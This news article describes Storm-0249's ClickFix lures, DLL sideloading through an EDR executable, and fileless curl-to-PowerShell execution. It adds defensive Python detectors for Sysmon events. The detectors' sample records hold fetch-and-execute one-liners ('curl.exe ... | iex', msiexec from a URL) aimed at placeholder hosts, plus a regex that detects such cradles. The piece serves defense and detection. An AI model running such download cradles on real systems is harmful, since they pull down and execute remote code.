Cybersecurity

Storm-0249 Abuses EDR Processes in Stealthy Attacks

By primereports, December 11, 2025


Initial access broker (IAB) Storm-0249 has shifted from noisy, easily detected phishing to highly targeted campaigns that are much harder to detect and stop.

According to ReliaQuest, Storm-0249, which is known for brokering network access to ransomware operators, is increasingly weaponizing legitimate endpoint detection and response (EDR) components as well as built-in Windows utilities for post-compromise activity: reconnaissance on compromised hosts, setting up command-and-control (C2) channels, and maintaining persistence. These tactics let Storm-0249 slip past defenses, move deep into networks, and operate almost entirely under the radar, the security vendor said.

‘Newcomer Energy’ from Storm-0249

“As an emerging IAB, Storm-0249 brings fresh newcomer energy to an already volatile landscape,” Brandon Tirado, director of threat intelligence at ReliaQuest, tells Dark Reading. “Its rapid pivot from traditional ransomware with broad generic phishing to stealthy, loader-centric and ClickFix-style campaigns lowers the technical and financial barrier for RaaS affiliates to gain fast, quiet access,” he says. 

This innovation-by-newcomer dynamic could accelerate copycat adoption across the IAB ecosystem, meaning defenders can no longer afford to dismiss low-reputation or recently observed actors, Tirado says. “Every novel threat must be treated as potentially high impact from day one.”

Storm-0249’s recent activity begins with ClickFix, a social-engineering lure that convinces users to paste and run a harmless-looking command in the Windows Run dialog. Instead of fixing anything, the command pulls down a spoofed Microsoft support installer, an MSI package, from a phishing site masquerading as a legitimate Microsoft support portal. Once launched, the MSI abuses the SYSTEM privileges under which the Windows Installer service runs machine-wide installs, letting the attackers drop files into protected directories and execute their payload with system-level control.

Inside the MSI, according to ReliaQuest, is a Trojanized Dynamic Link Library (DLL) that masquerades as a legitimate component of SentinelOne’s EDR software. The installer drops the weaponized DLL into the user’s AppData folder alongside a legitimate, signed SentinelOne executable that the attackers bring with them. When that executable starts and resolves the libraries it depends on, Windows searches the executable’s own directory first, so it loads the attacker’s DLL in place of the genuine one; the malicious code then runs inside a trusted, signed process without triggering typical signature-based alerts.

Such DLL sideloading attacks are not new. But Storm-0249’s integration of the technique into its playbook reflects a broader shift among threat actors toward “identity-based and evasion-heavy tactics,” ReliaQuest said. Importantly, the technique is easily adaptable and would work equally well with other EDR platforms, not just SentinelOne’s, the security vendor added.
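The sideloading chain described above leaves a distinctive trace in image-load telemetry: a trusted executable running from a user-writable directory pulls in a DLL from that same directory, and the DLL is either unsigned or carries the name of a library that normally lives under C:\Windows. The following Python is an added example, not code from the article, ReliaQuest or SentinelOne; it applies three such heuristics to constructed Sysmon Event ID 7 (Image loaded) records. The field names are Sysmon's; the user, vendor executable, directory names and the short list of system DLL names are illustrative assumptions.

```python
"""Flag DLL sideloading candidates in Sysmon Event ID 7 (Image loaded) records.

Added example, not ReliaQuest's or SentinelOne's logic. Field names follow
Sysmon EID 7; the users, file names and paths in SAMPLE_EVENTS are constructed.
"""
from pathlib import PureWindowsPath

# Directory names a standard user can write to. A trusted executable pulling a
# DLL from one of these is the core of the sideloading pattern described above.
USER_WRITABLE_MARKERS = {"appdata", "temp", "tmp", "programdata", "downloads", "public"}

# DLLs that legitimately live under %SystemRoot%. One of these loaded from any
# other directory is a search-order hijack / sideload indicator. Illustrative
# subset (assumption); build the real list from your own baseline.
SYSTEM_DLL_NAMES = {
    "version.dll", "cryptsp.dll", "cryptbase.dll", "dbghelp.dll",
    "wtsapi32.dll", "userenv.dll", "profapi.dll",
}


def in_user_writable(path: str) -> bool:
    """True if any path component is a user-writable location marker."""
    parts = {p.lower() for p in PureWindowsPath(path).parts}
    return bool(parts & USER_WRITABLE_MARKERS)


def under_windows_dir(path: str) -> bool:
    """True for paths like C:\\Windows\\System32\\foo.dll."""
    parts = PureWindowsPath(path).parts
    return len(parts) >= 2 and parts[1].lower() == "windows"


def analyze_image_load(event: dict) -> list:
    """Return one finding per matched heuristic for a single EID 7 record."""
    image, dll = event["Image"], event["ImageLoaded"]
    dll_path = PureWindowsPath(dll)
    # Sysmon's Signed/SignatureStatus describe the loaded module, not the process.
    signed_ok = (event.get("Signed", "false").lower() == "true"
                 and event.get("SignatureStatus") == "Valid")
    findings = []
    if in_user_writable(dll) and not signed_ok:
        findings.append({"rule": "unsigned_dll_from_user_path", "severity": "high"})
    if dll_path.name.lower() in SYSTEM_DLL_NAMES and not under_windows_dir(dll):
        findings.append({"rule": "system_dll_name_outside_windows", "severity": "high"})
    # Low severity on its own: self-updating apps legitimately live in AppData.
    # Useful for baselining which executables are expected there.
    if in_user_writable(image) and PureWindowsPath(image).parent == dll_path.parent:
        findings.append({"rule": "exe_and_dll_colocated_in_user_path", "severity": "low"})
    for f in findings:
        f.update(time=event.get("UtcTime"), image=image, dll=dll)
    return findings


def count_high(events) -> int:
    """Number of high-severity findings across a batch of events."""
    return sum(f["severity"] == "high" for e in events for f in analyze_image_load(e))


SAMPLE_EVENTS = [  # constructed; mirrors the sideload chain described in the article
    {"UtcTime": "2025-12-01 09:14:22.101",
     "Image": r"C:\Users\alice\AppData\Roaming\EdrHelper\edr_agent.exe",     # relocated signed vendor exe (hypothetical name)
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\EdrHelper\version.dll",  # attacker's DLL beside it
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"UtcTime": "2025-12-01 09:14:23.004",
     "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"UtcTime": "2025-12-01 09:15:40.517",
     "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\ffmpeg.dll",
     "Signed": "true", "Signature": "Microsoft Corporation", "SignatureStatus": "Valid"},
    {"UtcTime": "2025-12-01 09:16:02.330",
     "Image": r"C:\Program Files\Acme\acme.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\helper.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        for f in analyze_image_load(e):
            print(f"{f['severity']:<5} {f['rule']:<36} {f['image']} -> {f['dll']}")
```

Only the first constructed event trips all three rules; the Teams record shows why the co-location rule is kept at low severity and used for baselining rather than alerting, and the svchost record shows that the system DLL name rule stays quiet when the library really is loaded from C:\Windows. In production the same logic would consume EID 7 from a forwarder and should also check that the loading executable's signer matches the loaded DLL's signer, which needs a second lookup Sysmon does not provide inline.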

Leveraging Legit Windows Utilities

In some recent attacks, ReliaQuest observed Storm-0249 using built-in Windows tools such as curl.exe, which has shipped with Windows 10 and later since 2018, to fetch malicious PowerShell scripts from URLs that appeared to originate from Microsoft. Developers, sysadmins and others use curl.exe daily to download files, test APIs and automate tasks, so Storm-0249’s goal in using it is to blend in with normal activity and evade detection, ReliaQuest said.

The fetched scripts are piped straight into PowerShell and executed in memory, never touching disk. Because the commands are carried out by legitimate system utilities that are widely used for everyday IT operations, traditional endpoint defenses often fail to flag them, ReliaQuest said.
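Both stages described so far, the ClickFix command pasted into the Run dialog that fetches a spoofed MSI, and the curl.exe download piped straight into PowerShell, show up in process-creation telemetry rather than on disk. The following Python is an added example (not ReliaQuest's detection logic) that applies three heuristics to constructed Sysmon Event ID 1 (Process Create) records: a shell launched with a URL plus an execute-from-text token, a shell or msiexec spawned directly by explorer.exe with a URL (the Run dialog is hosted by explorer.exe), and msiexec installing from a URL. The domains, users, paths and the token list are assumptions made for the example.

```python
"""Flag ClickFix-style launches and in-memory download cradles in Sysmon
Event ID 1 (Process Create) records.

Added example; the heuristics are mine, not ReliaQuest's, and the events in
SAMPLE_EVENTS (domains, paths, users) are constructed.
"""
import re
from pathlib import PureWindowsPath

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Tokens that turn fetched text into running code without writing a file.
INLINE_EXEC_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b"            # PowerShell alias / cmdlet
    r"|(?<!\S)-e(?:nc|ncodedcommand)?\b"        # base64-encoded command
    r"|\|\s*(?:powershell|pwsh)(?:\.exe)?\b"    # output piped into a new shell
    r"|\bcurl(?:\.exe)?\b[^|]*\|",              # curl output piped onward
    re.IGNORECASE,
)

# Interpreters a Run-box one-liner typically lands in (assumed list).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def analyze_process_create(event: dict) -> list:
    """Return one finding per matched heuristic for a single EID 1 record."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    has_url = bool(URL_RE.search(cmd))
    findings = []
    # A shell given a URL plus an execute-from-text token: the curl | iex pattern.
    if image in SHELLS and has_url and INLINE_EXEC_RE.search(cmd):
        findings.append({"rule": "fileless_download_cradle", "severity": "high"})
    # Commands typed into the Run dialog are spawned by explorer.exe; a shell or
    # msiexec child of explorer.exe carrying a URL fits the ClickFix lure.
    if parent == "explorer.exe" and image in SHELLS | {"msiexec.exe"} and has_url:
        findings.append({"rule": "runbox_launch_with_url", "severity": "high"})
    # msiexec can install straight from a URL: the spoofed support-installer stage.
    if image == "msiexec.exe" and has_url:
        findings.append({"rule": "msiexec_install_from_url", "severity": "high"})
    for f in findings:
        f.update(time=event.get("UtcTime"), user=event.get("User"), cmd=cmd)
    return findings


def count_flagged(events) -> int:
    """Number of events that produced at least one finding."""
    return sum(bool(analyze_process_create(e)) for e in events)


SAMPLE_EVENTS = [  # constructed records
    {"UtcTime": "2025-12-01 09:13:58.220", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -w hidden -c "curl.exe -s https://support-portal.example/fix.ps1 | iex"'},
    {"UtcTime": "2025-12-01 09:14:05.770", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i https://support-portal.example/SupportTool.msi /qn"},
    {"UtcTime": "2025-12-01 10:02:11.003", "User": "CORP\\bob",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -o build.zip https://artifacts.example/build.zip"},   # plain download to disk
    {"UtcTime": "2025-12-01 10:05:00.000", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},                 # scheduled script, no URL
    {"UtcTime": "2025-12-01 10:07:31.415", "User": "CORP\\bob",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iwr https://ci.example/bootstrap.ps1 | iex"'},  # cradle, but not from the Run box
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        for f in analyze_process_create(e):
            print(f"{f['severity']:<5} {f['rule']:<28} {f['user']:<20} {f['cmd']}")
```

The third and fourth constructed records are the reason the rules key on the combination of URL, interpreter and execute-from-text token rather than on curl.exe itself: curl writing a file to disk and PowerShell running a local script are exactly the everyday usage Storm-0249 is hiding behind. The last record fires the cradle rule without the Run-box rule, which is the expected split when the same one-liner arrives through a scheduled task or a remote shell instead of a user pasting it. For the Run-box case, the per-user RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU keeps the text the user typed and is worth collecting as a corroborating artifact.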

“Fileless PowerShell executes entirely in memory and DLL sideloading abuses trusted, signed binaries,” notes Tirado. “So, both techniques bypass signature-based tools that still dominate many stacks.”

He assesses that threat actors like Storm-0249 deliberately lean into these well-known blind spots to establish credibility quickly. Effective countermeasures include behavioral analytics that flag anomalous DLL loads from unexpected paths, EDR baselining, and DNS monitoring that flags connections to newly registered domains (less than 90 days old).

The most exploited gaps, in Tirado’s opinion, remain unmonitored AppData directories and registry hives, over-reliance on perimeter and signature-based defenses, and allowlisting, without any constraints, the living-off-the-land binaries (LOLBins) that threat actors routinely abuse. Organizations should enforce strict LOLBin restrictions such as PowerShell Constrained Language Mode, segment networks aggressively, and deploy automated response playbooks, he says.
